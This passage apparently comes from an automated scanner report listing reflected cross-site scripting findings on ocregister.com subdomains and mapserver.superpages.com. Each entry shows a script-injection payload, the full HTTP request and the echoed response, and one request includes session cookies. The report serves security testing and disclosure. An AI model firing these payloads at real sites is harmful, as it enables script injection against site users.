/rss+xml" title=" Laguna Beach home sales up 13% over year - Laguna Beach Homes - www.ocregister.com" href="http://lagunahomes.ocregister.com/2011/02/03/laguna-beach-home-sales-up-13-over-year/14020/?366d8\"><script>alert(1)</script>65b84b53c1=1feed/" />
...[SNIP]...

1.180. http://lansner.ocregister.com/2011/02/01/really-no-housing-slump-in-san-marino/97740/ [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://lansner.ocregister.com
Path:   /2011/02/01/really-no-housing-slump-in-san-marino/97740/

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 79b73"><script>alert(1)</script>49eaba8a56a was submitted in the REST URL parameter 5. This input was echoed as 79b73\"><script>alert(1)</script>49eaba8a56a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2011/02/01/really-no-housing-slump-in-san-marino/9774079b73"><script>alert(1)</script>49eaba8a56a/ HTTP/1.1
Host: lansner.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:06:29 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://lansner.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:06:29 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 52502

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
="alternate" type="application/rss+xml" title=" Page not found - Lansner on Real Estate - www.ocregister.com" href="http://lansner.ocregister.com/2011/02/01/really-no-housing-slump-in-san-marino/9774079b73\"><script>alert(1)</script>49eaba8a56a/feed/" />
...[SNIP]...

1.181. http://lansner.ocregister.com/2011/02/01/really-no-housing-slump-in-san-marino/97740/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://lansner.ocregister.com
Path:   /2011/02/01/really-no-housing-slump-in-san-marino/97740/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c2156"><script>alert(1)</script>7f4f3a0d6f7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as c2156\"><script>alert(1)</script>7f4f3a0d6f7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2011/02/01/really-no-housing-slump-in-san-marino/97740/?c2156"><script>alert(1)</script>7f4f3a0d6f7=1 HTTP/1.1
Host: lansner.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:06:24 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://lansner.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:06:24 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 52506

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
alternate" type="application/rss+xml" title=" Page not found - Lansner on Real Estate - www.ocregister.com" href="http://lansner.ocregister.com/2011/02/01/really-no-housing-slump-in-san-marino/97740/?c2156\"><script>alert(1)</script>7f4f3a0d6f7=1feed/" />
...[SNIP]...

1.182. http://lansner.ocregister.com/2011/02/02/a-new-home-for-kobe-bryant/97596/ [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://lansner.ocregister.com
Path:   /2011/02/02/a-new-home-for-kobe-bryant/97596/

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a9132"><script>alert(1)</script>89260b73642 was submitted in the REST URL parameter 5. This input was echoed as a9132\"><script>alert(1)</script>89260b73642 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2011/02/02/a-new-home-for-kobe-bryant/97596a9132"><script>alert(1)</script>89260b73642/ HTTP/1.1
Host: lansner.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:06:46 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://lansner.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:06:49 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 52476

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" Page not found - Lansner on Real Estate - www.ocregister.com" href="http://lansner.ocregister.com/2011/02/02/a-new-home-for-kobe-bryant/97596a9132\"><script>alert(1)</script>89260b73642/feed/" />
...[SNIP]...

1.183. http://lansner.ocregister.com/2011/02/02/a-new-home-for-kobe-bryant/97596/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://lansner.ocregister.com
Path:   /2011/02/02/a-new-home-for-kobe-bryant/97596/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fa939"><script>alert(1)</script>23a10abfd00 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as fa939\"><script>alert(1)</script>23a10abfd00 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2011/02/02/a-new-home-for-kobe-bryant/97596/?fa939"><script>alert(1)</script>23a10abfd00=1 HTTP/1.1
Host: lansner.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:06:27 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://lansner.ocregister.com/xmlrpc.php
Link: <http://lansner.ocregister.com/?p=97596>; rel=shortlink
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 117579


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http:
...[SNIP]...
ternate" type="application/rss+xml" title=" A new home for Kobe Bryant? - Lansner on Real Estate - www.ocregister.com" href="http://lansner.ocregister.com/2011/02/02/a-new-home-for-kobe-bryant/97596/?fa939\"><script>alert(1)</script>23a10abfd00=1feed/" />
...[SNIP]...

1.184. http://lansner.ocregister.com/2011/02/02/homebuilding-slump-now-3-years-old/98070/ [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://lansner.ocregister.com
Path:   /2011/02/02/homebuilding-slump-now-3-years-old/98070/

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ec6f3"><script>alert(1)</script>2d65ca2126c was submitted in the REST URL parameter 5. This input was echoed as ec6f3\"><script>alert(1)</script>2d65ca2126c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2011/02/02/homebuilding-slump-now-3-years-old/98070ec6f3"><script>alert(1)</script>2d65ca2126c/ HTTP/1.1
Host: lansner.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:06:50 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://lansner.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:06:50 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 52467

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
rel="alternate" type="application/rss+xml" title=" Page not found - Lansner on Real Estate - www.ocregister.com" href="http://lansner.ocregister.com/2011/02/02/homebuilding-slump-now-3-years-old/98070ec6f3\"><script>alert(1)</script>2d65ca2126c/feed/" />
...[SNIP]...

1.185. http://lansner.ocregister.com/2011/02/02/homebuilding-slump-now-3-years-old/98070/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://lansner.ocregister.com
Path:   /2011/02/02/homebuilding-slump-now-3-years-old/98070/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 37e2a"><script>alert(1)</script>2f16017d2e8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 37e2a\"><script>alert(1)</script>2f16017d2e8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2011/02/02/homebuilding-slump-now-3-years-old/98070/?37e2a"><script>alert(1)</script>2f16017d2e8=1 HTTP/1.1
Host: lansner.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:06:28 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://lansner.ocregister.com/xmlrpc.php
Link: <http://lansner.ocregister.com/?p=98070>; rel=shortlink
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 103079


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http:
...[SNIP]...
application/rss+xml" title=" Homebuilding slump now 3 years old - Lansner on Real Estate - www.ocregister.com" href="http://lansner.ocregister.com/2011/02/02/homebuilding-slump-now-3-years-old/98070/?37e2a\"><script>alert(1)</script>2f16017d2e8=1feed/" />
...[SNIP]...

1.186. http://lansner.ocregister.com/2011/02/03/orange-county-property/98182/ [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://lansner.ocregister.com
Path:   /2011/02/03/orange-county-property/98182/

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload de683"><script>alert(1)</script>9b3add21ddf was submitted in the REST URL parameter 5. This input was echoed as de683\"><script>alert(1)</script>9b3add21ddf in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2011/02/03/orange-county-property/98182de683"><script>alert(1)</script>9b3add21ddf/ HTTP/1.1
Host: lansner.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:07:02 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://lansner.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:07:04 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 52454

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" Page not found - Lansner on Real Estate - www.ocregister.com" href="http://lansner.ocregister.com/2011/02/03/orange-county-property/98182de683\"><script>alert(1)</script>9b3add21ddf/feed/" />
...[SNIP]...

1.187. http://lansner.ocregister.com/2011/02/03/orange-county-property/98182/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://lansner.ocregister.com
Path:   /2011/02/03/orange-county-property/98182/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6abaf"><script>alert(1)</script>e1b7c34c143 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 6abaf\"><script>alert(1)</script>e1b7c34c143 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2011/02/03/orange-county-property/98182/?6abaf"><script>alert(1)</script>e1b7c34c143=1 HTTP/1.1
Host: lansner.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:06:31 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://lansner.ocregister.com/xmlrpc.php
Link: <http://lansner.ocregister.com/?p=98182>; rel=shortlink
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 145345


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http:
...[SNIP]...
pe="application/rss+xml" title=" 5th straight jump for O.C. property index - Lansner on Real Estate - www.ocregister.com" href="http://lansner.ocregister.com/2011/02/03/orange-county-property/98182/?6abaf\"><script>alert(1)</script>e1b7c34c143=1feed/" />
...[SNIP]...

1.188. http://lansner.ocregister.com/category/outlooks/eyeball-11/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://lansner.ocregister.com
Path:   /category/outlooks/eyeball-11/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 969aa"><script>alert(1)</script>21e3c1a89f6 was submitted in the REST URL parameter 1. This input was echoed as 969aa\"><script>alert(1)</script>21e3c1a89f6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /category969aa"><script>alert(1)</script>21e3c1a89f6/outlooks/eyeball-11/ HTTP/1.1
Host: lansner.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:06:29 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://lansner.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:06:29 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 52460

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" Page not found - Lansner on Real Estate - www.ocregister.com" href="http://lansner.ocregister.com/category969aa\"><script>alert(1)</script>21e3c1a89f6/outlooks/eyeball-11/feed/" />
...[SNIP]...

1.189. http://lansner.ocregister.com/category/outlooks/eyeball-11/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://lansner.ocregister.com
Path:   /category/outlooks/eyeball-11/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 35fdf"><script>alert(1)</script>012deb55675 was submitted in the REST URL parameter 2. This input was echoed as 35fdf\"><script>alert(1)</script>012deb55675 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /category/outlooks35fdf"><script>alert(1)</script>012deb55675/eyeball-11/ HTTP/1.1
Host: lansner.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:06:32 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://lansner.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 92878

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" Eyeball &#8217;11 - Lansner on Real Estate - www.ocregister.com" href="http://lansner.ocregister.com/category/outlooks35fdf\"><script>alert(1)</script>012deb55675/eyeball-11/feed/" />
...[SNIP]...

1.190. http://lansner.ocregister.com/category/outlooks/eyeball-11/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://lansner.ocregister.com
Path:   /category/outlooks/eyeball-11/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f1d12"><script>alert(1)</script>f582b534ec7 was submitted in the REST URL parameter 3. This input was echoed as f1d12\"><script>alert(1)</script>f582b534ec7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /category/outlooks/eyeball-11f1d12"><script>alert(1)</script>f582b534ec7/ HTTP/1.1
Host: lansner.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:06:36 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://lansner.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:06:37 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 52444

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" Page not found - Lansner on Real Estate - www.ocregister.com" href="http://lansner.ocregister.com/category/outlooks/eyeball-11f1d12\"><script>alert(1)</script>f582b534ec7/feed/" />
...[SNIP]...

1.191. http://lansner.ocregister.com/category/outlooks/eyeball-11/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://lansner.ocregister.com
Path:   /category/outlooks/eyeball-11/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3c705"><script>alert(1)</script>feb32e4d31b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 3c705\"><script>alert(1)</script>feb32e4d31b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /category/outlooks/eyeball-11/?3c705"><script>alert(1)</script>feb32e4d31b=1 HTTP/1.1
Host: lansner.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:06:25 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://lansner.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 92871

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" Eyeball &#8217;11 - Lansner on Real Estate - www.ocregister.com" href="http://lansner.ocregister.com/category/outlooks/eyeball-11/?3c705\"><script>alert(1)</script>feb32e4d31b=1feed/" />
...[SNIP]...

1.192. http://letters.ocregister.com/2011/02/01/states-economic-rock-bottom-closer-than-ever [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://letters.ocregister.com
Path:   /2011/02/01/states-economic-rock-bottom-closer-than-ever

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b6706"><script>alert(1)</script>6bccede39c1 was submitted in the REST URL parameter 4. This input was echoed as b6706\"><script>alert(1)</script>6bccede39c1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2011/02/01/states-economic-rock-bottom-closer-than-everb6706"><script>alert(1)</script>6bccede39c1 HTTP/1.1
Host: letters.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:07:28 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://letters.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:07:28 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53243

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
="alternate" type="application/rss+xml" title=" Page not found - Letters to the Editor - www.ocregister.com" href="http://letters.ocregister.com/2011/02/01/states-economic-rock-bottom-closer-than-everb6706\"><script>alert(1)</script>6bccede39c1feed/" />
...[SNIP]...

1.193. http://letters.ocregister.com/2011/02/02/egyptian-revolution-could-bring-u-s-trouble [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://letters.ocregister.com
Path:   /2011/02/02/egyptian-revolution-could-bring-u-s-trouble

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2b12b"><script>alert(1)</script>29a0ab24421 was submitted in the REST URL parameter 4. This input was echoed as 2b12b\"><script>alert(1)</script>29a0ab24421 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2011/02/02/egyptian-revolution-could-bring-u-s-trouble2b12b"><script>alert(1)</script>29a0ab24421 HTTP/1.1
Host: letters.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:07:25 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://letters.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:07:25 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53258

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
l="alternate" type="application/rss+xml" title=" Page not found - Letters to the Editor - www.ocregister.com" href="http://letters.ocregister.com/2011/02/02/egyptian-revolution-could-bring-u-s-trouble2b12b\"><script>alert(1)</script>29a0ab24421feed/" />
...[SNIP]...

1.194. http://mapserver.superpages.com/mapbasedsearch/ [&SRC parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mapserver.superpages.com
Path:   /mapbasedsearch/

Issue detail

The value of the &SRC request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e0186"%3balert(1)//4a2e6a0ce5b was submitted in the &SRC parameter. This input was echoed as e0186";alert(1)//4a2e6a0ce5b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /mapbasedsearch/?&SRC=comlocal1ae0186"%3balert(1)//4a2e6a0ce5b&C=banks&L=19101&CS=L&MCBP=true&C=Banks&STYPE=S&PS=15&search=Find+It HTTP/1.1
Host: mapserver.superpages.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_lastvisit=1296748870245; s_sq=%5B%5BB%5D%5D; SPC=1296748823650-www.superpages.com-30323935-794472; s_dfa=superpagescom; s_pv=Business%20Profile;

Response

HTTP/1.1 200 OK
Server: Unspecified
Set-Cookie: JSESSIONID=0A0D8557B1084404AFE23DD0AF0AF253; Path=/mapbasedsearch
Set-Cookie: spLocalHost=http://mapserver.superpages.com/mapbasedsearch/
Content-Type: text/html
Date: Thu, 03 Feb 2011 16:22:46 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<title></title>
<meta http
...[SNIP]...
window.locale = 'en-us';
var token = "RGBdU6R4GBImcYmepJZCuPc-P0ApKvan6CIRb_VBHpv7BOlE5AlS1J65xSZmZSy3C-3K_wv_hUyFJXQWMj1bvQ2";

var spHeader=false;
var cobrand="comlocal1ae0186";alert(1)//4a2e6a0ce5b";
var spYPC="";
var spPGID="";
var spOF="";
var spLid="";
var spBid="";
var spCampaignId="";
var spOnAMap=false;
var spC="banks";
var TopMostSW=false;
var spMS2=false;
var spLid2="";
var spBid2="";
va
...[SNIP]...

1.195. http://mapserver.superpages.com/mapbasedsearch/ [&spheader parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mapserver.superpages.com
Path:   /mapbasedsearch/

Issue detail

The value of the &spheader request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b305f"-alert(1)-"5b1a94486f6 was submitted in the &spheader parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /mapbasedsearch/?&spheader=trueb305f"-alert(1)-"5b1a94486f6& HTTP/1.1
Host: mapserver.superpages.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=78A519C6EB88961EA09FA2CFC9F74D50; __unam=c5114f2-12dec4b1cc4-7f15d273-1; SPC=1296748823650-www.superpages.com-30323935-794472; s_sq=%5B%5BB%5D%5D; s_ppv=100; web=; s_cc=true; s_lastvisit=1296754109045; s_vi=[CS]v1|26A56898051D3E94-40000129001DB9DD[CE]; yp=; s_dfa=superpagescom; spLocalHost=http://mapserver.superpages.com/mapbasedsearch/; shopping=; s.campaign=comlocal1a; s_pv=Maps;

Response

HTTP/1.1 200 OK
Server: Unspecified
Set-Cookie: JSESSIONID=E5BF135AD9937E6B27515B002A95E5A6; Path=/mapbasedsearch
Set-Cookie: spLocalHost=http://mapserver.superpages.com/mapbasedsearch/
Content-Type: text/html
Date: Thu, 03 Feb 2011 19:07:42 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<title></title>
<meta http
...[SNIP]...
= null;
// TEST: that this is returning what's expected
           var spReferer = false;
           var spDomain = "superpages.com";

           var spUrl = "http://mapserver.superpages.com/mapbasedsearch/?&spheader=trueb305f"-alert(1)-"5b1a94486f6&";

           var fbRedirectUri = "http://yellowpages.superpages.com/Facebook?prev=map";

           var fbClientId = "133515049997773";

</script>
...[SNIP]...

1.196. http://mapserver.superpages.com/mapbasedsearch/ [C parameter]

Summary

Severity:   High
Confidence:   Certain
